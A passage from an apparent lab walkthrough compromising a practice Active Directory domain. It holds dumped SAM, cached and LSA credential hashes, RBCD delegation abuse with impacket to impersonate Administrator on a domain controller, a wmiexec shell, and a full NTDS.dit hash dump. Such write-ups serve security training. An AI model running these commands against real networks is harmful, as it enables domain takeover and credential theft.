[*] Parsing SAM hive on 172.16.40.225
[*] Parsing SECURITY hive on 172.16.40.225
[*] Sucessfully cleaned up on 172.16.40.225
---------------Results from 172.16.40.225---------------
[*] SAM hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c76b0b0f314e47df64bb32f9d88849fe
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d4dcd8706c6043e3dd1bc0014c382881
[*] Cached domain logon information(domain/username:hash)
IT-IFRIT.VL/Sheila.Richards:$DCC2$10240#Sheila.Richards#a6f639c1d2500570e1322b4db31abfdf
IFRIT.VL/Charlotte.Cooper:$DCC2$10240#Charlotte.Cooper#43d2f2411258a8637a66c66b93c78aa9
EU-IFRIT.VL/Patrick.Ford:$DCC2$10240#Patrick.Ford#6559d2a366877cd46a3831616a3a0351
EU-IFRIT.VL/Caroline.Hunter:$DCC2$10240#Caroline.Hunter#23d470530c9bef38a9980e3ba4757a67
EU-IFRIT.VL/Administrator:$DCC2$10240#Administrator#bab69fc8aaeccd93d7cf74418a683b45
EU-IFRIT.VL/Michelle.Jordan:$DCC2$10240#Michelle.Jordan#2e12da5b77291da8a8cd42f3a80c81d7
EU-IFRIT.VL/Jemma.Smith:$DCC2$10240#Jemma.Smith#382c02b28f4d13af556df5dc05b39f7c
EU-IFRIT.VL/Mohammed.Ward:$DCC2$10240#Mohammed.Ward#f3e1295921f41414f62e88a967a4fd26
EU-IFRIT.VL/Jade.Perry:$DCC2$10240#Jade.Perry#f321a8bebee5c9a8098074d884d2e7a2
EU-IFRIT.VL/Laura.Robinson:$DCC2$10240#Laura.Robinson#34a120418a7503f8c725d667eee5ced5
[*] LSA Secrets
[*] $MACHINE.ACC
eu-ifrit.vl\VDI02$:aad3b435b51404eeaad3b435b51404ee:0740d3aead0827431013c3cc792e2759
[*] DPAPI_SYSTEM
dpapi_machinekey:ec5e2f000478a8d7cbcc4edb9be829853ed83abb
dpapi_userkey:a961a65b2f90aa16d73c2ad2cb73e3d8c47503bd
[*] NL$KM
NL$KM:844947842f3662657b5581aa36c699853582fa95f1bcb8aec04d492c8a1aff073d9d1c906a0e3f5c056ebca950b0d623976a9432f761307404058e87efd3a143
---------------Script execution completed---------------

Found VDI02\Administrator:c76b0b0f314e47df64bb32f9d88849fe

DC03 - RBCD abusing (EU-IFRIT.VL\Administrator) (Ifrit_Remember)

Try to find a vulnerable certificate template using the machine account VDI02$:

$ certipy-ad find -scheme ldap -u 'VDI02$' -hashes ':0740d3aead0827431013c3cc792e2759' -dc-ip 172.16.41.14 -stdout -enabled -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Authenticating to LDAP server
[+] Bound to ldap://172.16.41.14:389 - cleartext
[+] Default path: DC=eu-ifrit,DC=vl
[+] Configuration path: CN=Configuration,DC=eu-ifrit,DC=vl
[*] Finding certificate templates
[*] Found 0 certificate templates
[*] Finding certificate authorities
[*] Found 0 certificate authorities
[*] Found 0 enabled certificate templates
[*] Enumeration output:
Certificate Authorities                 : [!] Could not find any CAs
Certificate Templates                   : [!] Could not find any certificate templates

Hummm DC03 is only a Domain Controller

Step back and read again our previous BloudHound analysis and found that VDI02$ has this ACE privileges to DC03$:

  • WriteAccountRestriction
    • WriteAccountRestrictions, which refers to the User-Account-Restrictions property set, which contains enough permissions to modify the msDS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute of the target objects, for Kerberos RBCD attacks
  • AllowedToAct
    • AddAllowedToAct, a write permission on an object’s msDS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute, for Kerberos RBCD attacks

Let’s go to exploit them.

Check that the target computer object FS02$ does not have the attribute msds-allowedtoactonbehalfofotheridentity:

$ impacket-rbcd -action read -delegate-to 'DC03$' -dc-ip 172.16.41.14 eu-ifrit.vl/'VDI02$' -hashes ':0740d3aead0827431013c3cc792e2759'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty

Good we can exploit it

RBCD from FS02$ to DC03$ (as we have AddAllowedToAct) via S4U2Proxy:

$ impacket-rbcd -action write -delegate-from 'VDI02$' -delegate-to 'DC03$' -dc-ip 172.16.41.14 eu-ifrit.vl/'VDI02$' -hashes ':0740d3aead0827431013c3cc792e2759'                  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] VDI02$ can now impersonate users on DC03$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     VDI02$       (S-1-5-21-815464091-3988217837-1862656938-1103)

Request a Service Ticket(ST) with impersonate Administrator (will use S4U2Self/S4U2Proxy to request the ticket with protocol transition cifs):

$ impacket-getST -spn 'CIFS/DC03.eu-ifrit.vl' -impersonate 'Administrator' eu-ifrit.vl/'VDI02$'@DC03.eu-ifrit.vl -hashes ':0740d3aead0827431013c3cc792e2759' -dc-ip 172.16.41.14
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@CIFS_DC03.eu-ifrit.vl@EU-IFRIT.VL.ccache

Export and check the Service Ticket:

$ export KRB5CCNAME=Administrator@CIFS_DC03.eu-ifrit.vl@EU-IFRIT.VL.ccache                                                      
$ klist
Ticket cache: FILE:Administrator@CIFS_DC03.eu-ifrit.vl@EU-IFRIT.VL.ccache
Default principal: Administrator@eu-ifrit.vl

Valid starting     Expires            Service principal
09/07/24 18:00:53  09/08/24 04:00:52  CIFS/DC03.eu-ifrit.vl@EU-IFRIT.VL
	renew until 09/08/24 18:00:53

Then we can access to DC03 via WMI and get the 6th flag Ifrit_Remember:

$ impacket-wmiexec administrator@dc03.eu-ifrit.vl -k -no-pass -dc-ip 172.16.41.14                                                   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd Users
C:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is DA9E-0B89

 Directory of C:\Users

07/07/2024  03:15 AM    <DIR>          .
07/14/2024  06:43 AM    <DIR>          Administrator
07/14/2024  06:43 AM    <DIR>          Public
               0 File(s)              0 bytes
               3 Dir(s)   8,004,820,992 bytes free

C:\Users>dir Administrator\Desktop
 Volume in drive C has no label.
 Volume Serial Number is DA9E-0B89

 Directory of C:\Users\Administrator\Desktop

07/28/2024  08:59 AM    <DIR>          .
07/14/2024  06:43 AM    <DIR>          ..
07/14/2024  06:04 AM                36 flag.txt
07/28/2024  08:59 AM             2,308 Microsoft Edge.lnk
               2 File(s)          2,344 bytes
               2 Dir(s)   8,004,710,400 bytes free

C:\Users>type Administrator\Desktop\flag.txt
VL{f4f418041dbca4ccf93e2dd0987de394}

Then we proceed to dump ntds.dit using Kerberos authentication with NetExec:

$ nxc smb dc03.eu-ifrit.vl --use-kcache -M ntdsutil        
SMB         172.16.41.14    445    DC03             [*] Windows Server 2022 Build 20348 x64 (name:DC03) (domain:eu-ifrit.vl) (signing:True) (SMBv1:False)
SMB         172.16.41.14    445    DC03             [+] eu-ifrit.vl\Administrator from ccache (Pwn3d!)
NTDSUTIL    172.16.41.14    445    DC03             [*] Dumping ntds with ntdsutil.exe to C:\Windows\Temp\172570383
NTDSUTIL    172.16.41.14    445    DC03             Dumping the NTDS, this could take a while so go grab a redbull...
NTDSUTIL    172.16.41.14    445    DC03             [+] NTDS.dit dumped to C:\Windows\Temp\172570383
NTDSUTIL    172.16.41.14    445    DC03             [*] Copying NTDS dump to /tmp/tmp_utdjnff
NTDSUTIL    172.16.41.14    445    DC03             [*] NTDS dump copied to /tmp/tmp_utdjnff
NTDSUTIL    172.16.41.14    445    DC03             [+] Deleted C:\Windows\Temp\172570383 remote dump directory
NTDSUTIL    172.16.41.14    445    DC03             [+] Dumping the NTDS, this could take a while so go grab a redbull...
NTDSUTIL    172.16.41.14    445    DC03             Administrator:500:aad3b435b51404eeaad3b435b51404ee:d05ff1e30127c8d43e6b1ab5d22454c7:::
NTDSUTIL    172.16.41.14    445    DC03             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NTDSUTIL    172.16.41.14    445    DC03             DC03$:1000:aad3b435b51404eeaad3b435b51404ee:bfdd1ac93e25e7d1c7a84730ee9ff930:::
NTDSUTIL    172.16.41.14    445    DC03             krbtgt:502:aad3b435b51404eeaad3b435b51404ee:499e8c85c8697c04b3e4a8b10d95c56f:::
NTDSUTIL    172.16.41.14    445    DC03             VDI02$:1103:aad3b435b51404eeaad3b435b51404ee:0740d3aead0827431013c3cc792e2759:::
NTDSUTIL    172.16.41.14    445    DC03             DEV05$:1104:aad3b435b51404eeaad3b435b51404ee:4dcc55fd8114f377cc0eb9167b504a43:::
NTDSUTIL    172.16.41.14    445    DC03             SQL03$:1105:aad3b435b51404eeaad3b435b51404ee:2ed72f640cd2f05168b2d79e08bbe032:::
NTDSUTIL    172.16.41.14    445    DC03             SQL01$:1106:aad3b435b51404eeaad3b435b51404ee:da90d2c6284992f3f98eaee31ae62375:::
NTDSUTIL    172.16.41.14    445    DC03             DEV02$:1107:aad3b435b51404eeaad3b435b51404ee:aec1878baf7df6254e5e0b0867d84429:::
NTDSUTIL    172.16.41.14    445    DC03             DEV01$:1108:aad3b435b51404eeaad3b435b51404ee:e1271252b29d37804a0755b4da12c947:::
NTDSUTIL    172.16.41.14    445    DC03             VDI01$:1109:aad3b435b51404eeaad3b435b51404ee:a24714299d38ee4668dcbfb8ca7a2c27:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Lynne.Gibson:1111:aad3b435b51404eeaad3b435b51404ee:4c00f66ef2673da28fdf65073c15022d:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\June.Murphy:1112:aad3b435b51404eeaad3b435b51404ee:a1d9d716e232d5a02523b2132b56858e:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Eileen.Andrews:1113:aad3b435b51404eeaad3b435b51404ee:ec94884c17ed828a630d6fb10dfd7ea5:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Beverley.Connolly:1114:aad3b435b51404eeaad3b435b51404ee:e4ab756c56dc797091869754650b8901:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Janice.Stokes:1115:aad3b435b51404eeaad3b435b51404ee:934e1a626c937d1ff75371a677d87837:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Keith.Jackson:1116:aad3b435b51404eeaad3b435b51404ee:59f8cb52bc11a0724efc381f4cf74089:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Dawn.Clarke:1117:aad3b435b51404eeaad3b435b51404ee:968354a683d80c4e97cccab38a0d7226:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Ian.Connor:1118:aad3b435b51404eeaad3b435b51404ee:3663b3a0183cafd948f9c22ecfc3ef65:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Jordan.Moore:1119:aad3b435b51404eeaad3b435b51404ee:0e7cfe9b7b57916efe466b4cc8176c43:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Charles.Sullivan:1120:aad3b435b51404eeaad3b435b51404ee:782fe3a37d9484fcb8b9ffa6bc81df9e:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Jake.Kaur:1121:aad3b435b51404eeaad3b435b51404ee:b0dcdcb9c7fc0367f483dd954ef748ad:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Katherine.Williams:1122:aad3b435b51404eeaad3b435b51404ee:3be603e175fb98c909ecf0235bc7d1cb:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Robin.Hargreaves:1123:aad3b435b51404eeaad3b435b51404ee:8edc4321387a9ace54c3183962c6c6f5:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Arthur.Kirk:1124:aad3b435b51404eeaad3b435b51404ee:c716e78a94a1a5f09db29dfe8e6e52c6:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Dominic.Heath:1125:aad3b435b51404eeaad3b435b51404ee:167979e84c467392f2ff385ea7203322:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Joe.Brooks:1126:aad3b435b51404eeaad3b435b51404ee:f19d7fb8405b2903d927f82451bb23fb:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Peter.Nash:1127:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Natalie.Norris:1128:aad3b435b51404eeaad3b435b51404ee:81307209d47037dc075ff8540b577423:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Mary.Hunter:1129:aad3b435b51404eeaad3b435b51404ee:1dddada43940498e4ac3951feb6d8368:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Patricia.Johnson:1130:aad3b435b51404eeaad3b435b51404ee:25ac8bf7c3c3431e99615455d39a7e10:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Jemma.Bartlett:1131:aad3b435b51404eeaad3b435b51404ee:f5ac261330643a6866b1457e8a22c5bb:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Sheila.Sharp:1132:aad3b435b51404eeaad3b435b51404ee:c369fe872eedb4559a11ce08fc9c372d:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Jacob.O'Donnell:1133:aad3b435b51404eeaad3b435b51404ee:fa589edc0641c6c20f729eb5f446d577:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Nicola.Winter:1134:aad3b435b51404eeaad3b435b51404ee:fb070768a6c1ec5bd38be914c8215a33:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Tony.Graham:1135:aad3b435b51404eeaad3b435b51404ee:028620443db3135412dc5fb1af5af0cc:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Glen.Marshall:1136:aad3b435b51404eeaad3b435b51404ee:85fd5fc1321e0544fc7ff2d9ccabfb8e:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Caroline.Wilson:1137:aad3b435b51404eeaad3b435b51404ee:f83be6d8e1ecb6b687724f8b41b7ed18:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Georgina.Burns:1138:aad3b435b51404eeaad3b435b51404ee:6b4a3ce89c68227a45302cc251bb2a7a:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Caroline.Thornton:1139:aad3b435b51404eeaad3b435b51404ee:c0bb6e026daa2d75dc0f73f2af9d4f0f:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Elliott.Kay:1140:aad3b435b51404eeaad3b435b51404ee:53490d9048cce42029a51cb155cac256:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Nigel.Sutton:1141:aad3b435b51404eeaad3b435b51404ee:ac314130b1364fdba26bd02848c23b2a:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Jade.Perry:1142:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Molly.Wilson:1143:aad3b435b51404eeaad3b435b51404ee:8b9b472af2f84ea67742d960b0c8d0e7:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Elliott.Nicholls:1144:aad3b435b51404eeaad3b435b51404ee:048177489d3f510bd93aa5052ce8a8e9:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Heather.Little:1145:aad3b435b51404eeaad3b435b51404ee:32c2a0bb7dfdbe410c87d2869580eefc:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Benjamin.Walker:1146:aad3b435b51404eeaad3b435b51404ee:652f2bc0af3032149e77a621e1c28e90:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Jamie.Smith:1147:aad3b435b51404eeaad3b435b51404ee:0c43890ce3b209669c064cb96b0c8b4a:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Lucy.Morgan:1148:aad3b435b51404eeaad3b435b51404ee:a35e9ce83d0575ef40941890bd9b7fe2:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Bruce.Hewitt:1149:aad3b435b51404eeaad3b435b51404ee:efb9a484226c0ec231fbf3b597feec14:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Bernard.Davey:1150:aad3b435b51404eeaad3b435b51404ee:a6b53f4780c51f441cf6cfbeb0159807:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Mary.Smith:1151:aad3b435b51404eeaad3b435b51404ee:6221d773871720d4cd492237138102be:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Barry.Foster:1152:aad3b435b51404eeaad3b435b51404ee:eb11f41f997cebede2812083d5cd99b8:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Brett.Roberts:1153:aad3b435b51404eeaad3b435b51404ee:95bba9d23786a613f3089f514103203a:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Connor.Cook:1154:aad3b435b51404eeaad3b435b51404ee:63a7c1db8e67e04b5a0ceea6f11269e9:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Anthony.Heath:1155:aad3b435b51404eeaad3b435b51404ee:c918fb84ad2a2078d9c142844914378e:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Michelle.Young:1156:aad3b435b51404eeaad3b435b51404ee:bfc54a0345c48e95bbd76df9c2aa123a:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Danny.Roberts:1157:aad3b435b51404eeaad3b435b51404ee:a0969b369947f2f77d0d06c47fbda067:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Lynne.Hayward:1158:aad3b435b51404eeaad3b435b51404ee:b6b6b00f256451a177c3be959979256b:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Steven.Bowen:1159:aad3b435b51404eeaad3b435b51404ee:ad273b7c57e58d16215d0ad093cca664:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Martin.Simpson:1160:aad3b435b51404eeaad3b435b51404ee:0c3179a8f892acc1b45eb4c1fde66c8c:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Gail.Cox:1161:aad3b435b51404eeaad3b435b51404ee:5fed12475f17311d84b6b7db9f78acd4:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Joe.Nicholls:1162:aad3b435b51404eeaad3b435b51404ee:ea55ff9053edd2419aeb543ac2c26eb0:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Barry.Cox:1163:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Francesca.Ahmed:1164:aad3b435b51404eeaad3b435b51404ee:1a8a8794fa3957310b5372739d82ef65:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Megan.Howard:1165:aad3b435b51404eeaad3b435b51404ee:c623b06210807e97ebc6504b2d96f2b4:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Martin.Marsden:1166:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Grace.Dunn:1167:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Derek.Giles:1168:aad3b435b51404eeaad3b435b51404ee:24b547b196e3e42049b544fe83e3deab:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Malcolm.Palmer:1169:aad3b435b51404eeaad3b435b51404ee:c7de7a41492ab27a886cd768c953e3cc:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Hollie.Hunt:1170:aad3b435b51404eeaad3b435b51404ee:59559b8e1f157816b67f4dd374aa1f79:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Hollie.Harrison:1171:aad3b435b51404eeaad3b435b51404ee:3e9042ed32c837e359eb4c2a69e4bcaa:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Cheryl.Evans:1172:aad3b435b51404eeaad3b435b51404ee:d19c2185cfb9d54b1806f540f92aa454:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Stacey.Pratt:1173:aad3b435b51404eeaad3b435b51404ee:278e01dbddb6e1ef67fdd6725b10bd4e:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Toby.Knight:1174:aad3b435b51404eeaad3b435b51404ee:746702ce5c228d2375723d940be95d3f:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Jonathan.Richardson:1175:aad3b435b51404eeaad3b435b51404ee:16c16165f953116713c3b76ee75886f1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Claire.Lewis:1176:aad3b435b51404eeaad3b435b51404ee:e8170bc121a7aed6a05d658fff35a781:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Elliott.Carr:1177:aad3b435b51404eeaad3b435b51404ee:d74be860fa26f52986d914b0d77d39d2:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Jade.Smith:1178:aad3b435b51404eeaad3b435b51404ee:1641adb085a22f6a91df8958a8190c7e:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Marc.Mitchell:1179:aad3b435b51404eeaad3b435b51404ee:57d0d7e2575f18c7e3fe90561ff44c01:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\James.Cook:1180:aad3b435b51404eeaad3b435b51404ee:b8c38f438c0468573c0d074464684b27:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Maria.Parkinson:1181:aad3b435b51404eeaad3b435b51404ee:59c247ab830b73393f64d82ff601401e:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Aaron.Jones:1182:aad3b435b51404eeaad3b435b51404ee:d2dd475ba4c37db26d11fad96e0ff89f:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Jasmine.Smith:1183:aad3b435b51404eeaad3b435b51404ee:f7f91688d0a46a28eeeb470efd6f162d:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Ashley.O'Neill:1184:aad3b435b51404eeaad3b435b51404ee:b4146a94dcd15c7834333abbd20422c2:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Judith.Hawkins:1185:aad3b435b51404eeaad3b435b51404ee:38ebc1fc2c7392d5b611deb856c48463:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Iain.Graham:1186:aad3b435b51404eeaad3b435b51404ee:83d6b6f635e37c48c9720e8aa7db8979:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Martin.Dawson:1187:aad3b435b51404eeaad3b435b51404ee:145a74511ef826f13c68d09d5d82c525:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Robin.Scott:1188:aad3b435b51404eeaad3b435b51404ee:b8b277b6304682bab1d4a238c459342d:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Denis.Davies:1189:aad3b435b51404eeaad3b435b51404ee:0252451b099a3b68cdc26dac7cf0fa53:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Alan.Fox:1190:aad3b435b51404eeaad3b435b51404ee:f128fb5bbd553f83d143f01655b7bbbf:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Russell.Hurst:1191:aad3b435b51404eeaad3b435b51404ee:7fbf47abf6a6382ea4f51125c99e31ef:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Marian.Bell:1192:aad3b435b51404eeaad3b435b51404ee:761af4a020c37a36e678a2a3f1cb559a:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Michelle.Butler:1193:aad3b435b51404eeaad3b435b51404ee:6a873026c5b3d7b21ab8fabb93e1b440:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Martin.Kirk:1194:aad3b435b51404eeaad3b435b51404ee:04e84914a65c5d53fb1f3b12a0bd94b5:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Josephine.Walker:1195:aad3b435b51404eeaad3b435b51404ee:fb817122ab752d08d96359681f633334:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\William.McLean:1196:aad3b435b51404eeaad3b435b51404ee:586f930270f9946e16884dc3ec9262e8:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Chloe.Scott:1197:aad3b435b51404eeaad3b435b51404ee:3fb2485c87715f2c6635a66af66511da:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Caroline.Barker:1198:aad3b435b51404eeaad3b435b51404ee:160ade2e241c8b14d56bb54efe58cda8:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Maurice.Davies:1199:aad3b435b51404eeaad3b435b51404ee:d91e63655c7f60586fd80ab09e1e4988:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Caroline.Hunter:1200:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Gareth.Hussain:1201:aad3b435b51404eeaad3b435b51404ee:eaebba071e533ace24f0ca0c86357574:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Gillian.Roberts:1202:aad3b435b51404eeaad3b435b51404ee:25b6881d0b93a571ad745ae5c7bcbb75:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Keith.Smith:1203:aad3b435b51404eeaad3b435b51404ee:3755edaf51257afd982955d138944a52:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Bernard.Walters:1204:aad3b435b51404eeaad3b435b51404ee:7efd117034fcdf10a1676d4d7dd7da2a:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Sian.Kemp:1205:aad3b435b51404eeaad3b435b51404ee:fa1c3027f839eb3acb5b5f82c6e9f1db:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Julie.Rees:1206:aad3b435b51404eeaad3b435b51404ee:b6d1f9836354e05a8e3fb37834b9a2ed:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Leigh.Watson:1207:aad3b435b51404eeaad3b435b51404ee:f271a3e0152b79e128bb40d661f4cd57:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Linda.Lee:1208:aad3b435b51404eeaad3b435b51404ee:5468d1e5892e73a4fbbc164454712055:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Frederick.Jackson:1209:aad3b435b51404eeaad3b435b51404ee:6e1914978954057c94526f66979b2593:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Michelle.Jordan:1210:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Kathleen.Taylor:1211:aad3b435b51404eeaad3b435b51404ee:322f974cc075a5500b15f2f58a1b20ce:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Gareth.Newton:1212:aad3b435b51404eeaad3b435b51404ee:28e4c3ac363d190f4f8df412bda689aa:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Damien.Hartley:1213:aad3b435b51404eeaad3b435b51404ee:1dba2423724c3b72e9ff800ae4555e0d:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Diane.Carroll:1214:aad3b435b51404eeaad3b435b51404ee:3c27dcc433735ccfb496183c9b8a0e77:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Wendy.French:1215:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Victor.Jenkins:1216:aad3b435b51404eeaad3b435b51404ee:9bef6688e99ed14ebd02af162d637394:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Joyce.Johnson:1217:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Josh.Wilson:1218:aad3b435b51404eeaad3b435b51404ee:aa2a0297476db39ce1259cdebc09f33f:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Kathleen.Walker:1219:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
